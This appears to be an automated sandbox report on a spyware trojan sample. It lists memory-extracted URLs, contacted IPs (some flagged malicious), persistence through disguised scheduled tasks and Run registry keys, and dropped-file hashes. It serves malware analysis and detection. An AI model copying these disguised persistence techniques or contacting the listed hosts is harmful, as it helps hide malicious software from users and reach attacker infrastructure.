                                                                                                        https://api.ip.sb/ipB3BA.exe, 00000014.00000002.565709295.0000000003881000.00000004.00000001.sdmp, B3BA.exe, 00000014.00000002.566907931.00000000039F1000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000000.537971963.0000000000402000.00000040.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.ver)svchost.exe, 0000001C.00000002.527807876.0000023921EED000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.689092568.000001D6DA212000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		low
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Entity/Id24ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressingB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://support.google.com/chrome/?p=plugin_shockwaveB3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://tempuri.org/Entity/Id5ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id10ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://tempuri.org/Entity/Id8ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://support.google.com/chrome/?p=plugin_wmpB3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentityB3BA.exe, 0000002A.00000002.663930181.0000000002F30000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://support.google.com/chrome/?p=plugin_javaB3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/06/addressingexB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://support.google.com/chrome/?p=plugin_divxB3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.tiktok.com/legal/reportsvchost.exe, 0000001C.00000003.498191855.000002392257F000.00000004.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://tempuri.org/Entity/Id13ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoB3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2002/12/policyB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://tempuri.org/Entity/Id22ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchB3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001C.00000003.498147484.00000239225A7000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498274252.0000023922A02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498236848.0000023922590000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498191855.000002392257F000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.498105135.00000239225A7000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/IssueB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://get.adobB3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmpfalse
                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/scB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://tempuri.org/Entity/Id18ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://service.real.com/realplayer/security/02062012_player/en/B3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://disneyplus.com/legal.svchost.exe, 0000001C.00000003.496464238.0000023922591000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://tempuri.org/Entity/Id3ResponseB3BA.exe, 0000002A.00000002.701960053.00000000030CD000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rmB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://schemas.xmlsoap.org/soap/actor/nextB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=B3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701628469.0000000003088000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.747432907.000000000332F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpfalse
                                                                                                                                                                                                            		high

                                                                                                                                                                                                            Contacted IPs

                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                            Public

                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            185.163.45.70
                                                                                                                                                                                                            		unknownMoldova Republic of
                                                                                                                                                                                                            		39798MIVOCLOUDMDfalse
                                                                                                                                                                                                            188.166.28.199
                                                                                                                                                                                                            		unknownNetherlands
                                                                                                                                                                                                            		14061DIGITALOCEAN-ASNUStrue
                                                                                                                                                                                                            54.38.220.85
                                                                                                                                                                                                            		unicupload.topFrance
                                                                                                                                                                                                            		16276OVHFRfalse
                                                                                                                                                                                                            104.47.54.36
                                                                                                                                                                                                            		microsoft-com.mail.protection.outlook.comUnited States
                                                                                                                                                                                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                            104.21.38.221
                                                                                                                                                                                                            		goo.suUnited States
                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            93.189.42.167
                                                                                                                                                                                                            		host-data-coin-11.comRussian Federation
                                                                                                                                                                                                            		41853NTCOM-ASRUfalse
                                                                                                                                                                                                            144.76.136.153
                                                                                                                                                                                                            		transfer.shGermany
                                                                                                                                                                                                            		24940HETZNER-ASDEfalse
                                                                                                                                                                                                            185.233.81.115
                                                                                                                                                                                                            		unknownRussian Federation
                                                                                                                                                                                                            		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                                                                            8.209.67.104
                                                                                                                                                                                                            		patmushta.infoSingapore
                                                                                                                                                                                                            		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                                                            185.7.214.171
                                                                                                                                                                                                            		unknownFrance
                                                                                                                                                                                                            		42652DELUNETDEtrue
                                                                                                                                                                                                            185.186.142.166
                                                                                                                                                                                                            		unknownRussian Federation
                                                                                                                                                                                                            		204490ASKONTELRUtrue
                                                                                                                                                                                                            141.8.194.74
                                                                                                                                                                                                            		a0621298.xsph.ruRussian Federation
                                                                                                                                                                                                            		35278SPRINTHOSTRUfalse
                                                                                                                                                                                                            185.163.204.22
                                                                                                                                                                                                            		unknownGermany
                                                                                                                                                                                                            		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse
                                                                                                                                                                                                            185.163.204.24
                                                                                                                                                                                                            		unknownGermany
                                                                                                                                                                                                            		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse
                                                                                                                                                                                                            162.159.134.233
                                                                                                                                                                                                            		cdn.discordapp.comUnited States
                                                                                                                                                                                                            		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                            Private

                                                                                                                                                                                                            IP
                                                                                                                                                                                                            192.168.2.1
                                                                                                                                                                                                            127.0.0.1

                                                                                                                                                                                                            General Information

                                                                                                                                                                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                                            Analysis ID:552945
                                                                                                                                                                                                            Start date:13.01.2022
                                                                                                                                                                                                            Start time:23:27:23
                                                                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 16m 5s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:light
                                                                                                                                                                                                            Sample file name:0Cjy7Lkv1A.exe
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                            Number of analysed new started processes analysed:50
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:1
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • HDC enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@56/31@94/17
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 83.3%
                                                                                                                                                                                                            HDC Information:
                                                                                                                                                                                                            • Successful, ratio: 29.6% (good quality ratio 24.7%)
                                                                                                                                                                                                            • Quality average: 67.8%
                                                                                                                                                                                                            • Quality standard deviation: 37%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 96%
                                                                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Adjust boot time
                                                                                                                                                                                                            • Enable AMSI
                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                            Warnings:
                                                                                                                                                                                                            Show All
                                                                                                                                                                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.54.110.249, 20.189.173.20, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 23.211.4.86, 20.189.173.21
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, yandex.ru, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, iplogger.org, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, microsoft.com, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                                            • Execution Graph export aborted for target B3BA.exe, PID 1756 because it is empty
                                                                                                                                                                                                            • Execution Graph export aborted for target B3BA.exe, PID 4264 because there are no executed function
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            23:29:09Task SchedulerRun new task: Firefox Default Browser Agent EDCB7C3654C5C579 path: C:\Users\user\AppData\Roaming\ujhcrda
                                                                                                                                                                                                            23:29:21API Interceptor1x Sleep call for process: 7063.exe modified
                                                                                                                                                                                                            23:29:32API Interceptor10x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                            23:29:41API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                            23:30:08API Interceptor3x Sleep call for process: 1BCC.exe modified
                                                                                                                                                                                                            23:30:10Task SchedulerRun new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                                                                                                                                                                                                            23:30:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
                                                                                                                                                                                                            23:30:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_s.exe
                                                                                                                                                                                                            23:30:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Steam C:\Users\user\AppData\Roaming\NVIDIA\dllhost.exe
                                                                                                                                                                                                            23:30:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\setup_s.exe
                                                                                                                                                                                                            23:31:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start ChromeUpdate.lnk

                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                            IPs

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Domains

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            ASN

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:MPEG-4 LOAS
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                            Entropy (8bit):0.24859360587628684
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU46:BJiRdwfu2SRU46
                                                                                                                                                                                                            MD5:A83E0A729D4A1F55166CB05328B01B69
                                                                                                                                                                                                            SHA1:CB9E63E045059073AC31F4A4630B1228444D4015
                                                                                                                                                                                                            SHA-256:E390FCBF4FF541845B1C55FBA10CBDCEA0C364620A90280EA1BD75E27BD118B1
                                                                                                                                                                                                            SHA-512:E779E06BA24BD4409354222DF3E22C31250BCC279157F7020BFBA3259A985506DCDD3B3178F068C2E9DD1AE65E56247F1EAFA1A89649C1ACC46A9517D1E4424A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x81ef5937, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):786432
                                                                                                                                                                                                            Entropy (8bit):0.25071192802551023
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:c+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:DSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                                                                            MD5:18F46E54AD0F6D90BAA6DD6ADDBB5B06
                                                                                                                                                                                                            SHA1:02A2CD28172475401FA0EB4DEFED4116A27C504B
                                                                                                                                                                                                            SHA-256:635C3E6F66EC0E3AE0A794FE3F336039F8D3FDB65269E216051F6844B6293FD2
                                                                                                                                                                                                            SHA-512:C50F160F2B9676EFE8C3C13EA911A3C8B9AD5132D8214CBCF605B4984C1AA77AAF28DE98CFF0B6880B79B4BC16FC734B62BFAC4D04465AEEBA4F19D976C66ECC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: ..Y7... ................e.f.3...w........................&..........w..*....z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................k.#.*....z.u...................*....z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                            Entropy (8bit):0.07743634763724366
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Gwlt1EvPzghl/bJdAtiSPzW01oll3Vkttlmlnl:GQysht4rzK3
                                                                                                                                                                                                            MD5:6C5620A22A87F1FAA1C600661C7FB193
                                                                                                                                                                                                            SHA1:BF2C1E30D2423E49777823EBF419C0B070BE65CC
